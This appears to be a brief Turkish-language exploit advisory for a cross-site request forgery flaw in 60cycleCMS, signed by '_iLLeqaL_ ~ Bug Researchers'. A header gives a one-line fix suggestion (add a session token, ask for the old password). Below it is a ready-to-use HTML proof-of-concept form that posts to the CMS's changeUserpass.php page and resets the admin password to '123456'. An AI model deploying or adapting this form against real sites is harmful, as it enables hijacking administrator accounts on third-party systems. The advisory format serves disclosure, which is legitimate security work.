< ------------------- header data start ------------------- >

#############################################################

# Application Name : 60cycleCMS

# vulnerable Type : XSRF

# Infection : Admin sifresi degistirilebilir ..

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli , eski sifre sorulmalidir ..

# author : _iLLeqaL_ ~ Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

<form action=http://[site].com/[yol]/private/changeUserpass.php method=post name=changeUserpass>
<input name=hidden type=text value=admin /><br />
<input name=hidden type=password value=123456 /><br />
<input name=hidden type=password value=123456/><br />
<input type=submit value=Submit />
</form>

< -- bug code end of -- >